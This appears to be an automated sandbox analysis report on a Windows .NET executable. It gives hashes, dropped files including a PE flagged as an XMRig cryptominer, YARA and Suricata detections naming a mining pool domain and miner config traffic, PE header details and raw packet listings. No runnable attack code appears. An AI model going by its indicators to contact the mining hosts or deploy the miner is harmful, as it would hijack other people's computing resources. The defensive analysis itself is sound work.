SHA-512:	4FAE5393B55AE68186D185CA27D8007A750D65D2E71C06DB162E97A56BF556D8902748A706091CA265FE921DF4A6C9D523AB193AD46E339F7D5F8ED5876DAE80
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.........z...............z...............H...8~G.......................................................................Y.................r...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...............................E...................m)..........K....................................+......................**................6."...........w.&.........w..._.\|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	68120
Entropy (8bit):	4.282202859087065
Encrypted:	false
SSDEEP:	384:YkFR4kFRKvnQ5oIMtdyo0Mt8op0MorN9o0MtEJo0MtQ1a2oT0ojoKosZJoOododH:h/eo7dggbCj
MD5:	A960081B3DD373FB0181E29370B6A438
SHA1:	4F26CF87C30B0DAC43C0B9CABCCB666190936DE6
SHA-256:	3EF116863432F618C3E134842B5F48C6A83383489F9063D5678511E902539917
SHA-512:	4602E3E7D164319FE604C21D6CF7514C2EDCD443800E0AA2BE5C8A1034EA2A6ECEB977122AA6B0632AAC6AD3838806C5627EFC23971C281589E7C5B73B0BB760
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk..................].......].................. y[......................................................................>......................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...................................................&...........................................................................................**.......].......I.W...........L.&.........L.)[._j;h./..`?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	82384
Entropy (8bit):	4.456292042571095
Encrypted:	false
SSDEEP:	768:bWjDnjWjDngZhrUcSalhGQPJQJytU3c46yy3WjDn6n:qPnCPn42TcEtc46dGPnW
MD5:	266B1879FD02767186EE411847DE6C12
SHA1:	161D06E93F4A344D0242789FC3AF5B2946DA8BE6
SHA-256:	5764BDF3BA8CDD8776B09788CB6A63FD4B7D8715930002C4A158811EC66EC11B
SHA-512:	96A2169069EEB216626CF20007C73ABE8F7D504B3CC9A2563294363A94206AD27CF7974B120777640A29DA692C68550467FBCAA34BBE3E5429A337E2FBDAE25F
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk......................... ...........(........zi.....................................................................b...................@...s...h...............h...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...................&...........................................................................................................................**..0............I.W.........M.PK&.......M.PK\.:X..r.o.dx;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	57952
Entropy (8bit):	3.8708574097073822
Encrypted:	false
SSDEEP:	1536:sC+gjGMu2kykVe97Ifd4k3KitC84z+kqPJl/d:Qhx
MD5:	98099999DC7566C1E7B9171AE45BB285
SHA1:	65CE4AAA14774BFE780ABFA7978AAAD50A8F6443
SHA-256:	23E68786C78199BAA60460BA13968696824ECDD7540A951F9EB0265C816272EC
SHA-512:	94EDAF29FEB0AD101BF77BEE10ED986BA2C0AC0B9B2394FDF2156C141840AB078C3AF2D179928C22265FEA1796F0D2F859DC1EA7E50D9F18A7C581F51EAE7BA3
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.....................................xj...s...'W....................................................................................................................=..........................................................................................................................._...............8...........................f...................M...c...........................n.......................................................................................&...............................*...............a.W.........z...&.......z...S..\..`..).........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

C:\Windows\Temp\__PSScriptPolicyTest_0yeu4h3k.z1i.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_ezajeazv.glw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_hzjaxbhy.3u1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_rirnvh0w.2uo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\jscseoeoqftm.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5536256
Entropy (8bit):	6.689058470432344
Encrypted:	false
SSDEEP:	98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
MD5:	8FA2F1BA9B9A7EA2B3C4DD627C627CEC
SHA1:	358E3800286E5D4C5662366AD7311BC5A51BA497
SHA-256:	78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
SHA-512:	74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: Joe Security Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: ditekSHen Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: Florian Roth Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................\|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.552632611901318
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	zufmUwylvo.exe
File size:	266'752 bytes
MD5:	c526cb2c72a976831c06fc09991e20d8
SHA1:	b719c9c64a5368abf2671a0e8d6ef8902bdaf9aa
SHA256:	53ad8953df55fbe65065f3e94135a4596f6209f20947c0e3df949910ce6cbbc6
SHA512:	a9d97d89d01fb056515ba4e3bb8d9e1836adb468564979fddc654855aa8d74946f3e8a287bad95c81f1e33e36a66655735f2b849e920ef07664ee90bd32a338e
SSDEEP:	6144:xZuorQXqrFqkp4AsBIPO/BbyiL/5CVlKULZSvb:jAq7pwIBSRilKUL
TLSH:	CA441A2A3BE50808E0EE89FE999E5B77C654D1127801B753B75372B20D05AFCED4B0E6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C............"...0.............n'... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x44276e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9AEB43BA [Sun May 12 06:52:42 2052 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x42720	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x44000	0x5ae	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x46000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x40774	0x40800	a710abf6d7128ae3279495321dd9dbd5	False	0.44782203851744184	data	5.567050370118544	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x44000	0x5ae	0x600	d00b022c8db8809a6c714f9f6a9394cd	False	0.423828125	data	4.07561211898091	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x46000	0xc	0x200	0fd7bf495fecf199e3baed688870330c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x440a0	0x324	data			0.43407960199004975
RT_MANIFEST	0x443c4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-09T16:30:15.039753+0200	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.11.30	54743	1.1.1.1	53	UDP
2024-10-09T16:30:17.283464+0200	2054247	ET MALWARE SilentCryptoMiner Agent Config Inbound	1	104.20.3.235	443	192.168.11.30	49779	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 9, 2024 16:29:48.645433903 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:48.645472050 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:48.646370888 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:48.653393984 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:48.653419971 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:48.871460915 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:48.871690035 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:48.876605988 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:48.876621008 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:48.876852989 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:48.917752981 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:48.960216045 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.076925993 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.077003002 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.077264071 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.077279091 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.084512949 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.084754944 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.084769964 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.090984106 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.091276884 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.091291904 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.097997904 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.098298073 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.098314047 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.105499029 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.105813026 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.105828047 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.112200022 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.112551928 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.112565994 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.126718998 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.127026081 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.127042055 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.172399998 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.177483082 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.180593014 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.180630922 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.180896997 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.180911064 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.181140900 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.187436104 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.194442987 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.194681883 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.194695950 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.201472044 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.201747894 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.201761961 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.209054947 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.209292889 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.209306002 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.215775967 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.216088057 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.216099024 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.222759962 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.223073959 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.223087072 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.229635000 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.229921103 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.229933977 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.237273932 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.237489939 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.237503052 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.249607086 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.249650002 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.249907970 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.249922037 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.250139952 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.256040096 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.262882948 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.262923956 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.263191938 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.263206005 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.263426065 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.271123886 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.276144028 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.276454926 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.276468039 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.276721954 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.286915064 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.287168026 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.294965029 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.295213938 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.298893929 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.299223900 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.306801081 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.307045937 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.310425997 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.310667992 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.318466902 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.318690062 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.325808048 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.326054096 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.329730034 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.329974890 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.337481022 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.337723017 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.345262051 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.345508099 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.349280119 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.349524975 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.356956005 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.357196093 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.360380888 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.360732079 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.367161036 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.367532015 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.373967886 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.374432087 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.377892971 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.378274918 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.384449959 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.384823084 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.387341022 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.387697935 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.391096115 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.391280890 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.395838976 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.396215916 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.398653984 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.399030924 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.402046919 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.402671099 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:49.404807091 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:49.405415058 CEST	49775	443	192.168.11.30	84.32.84.151
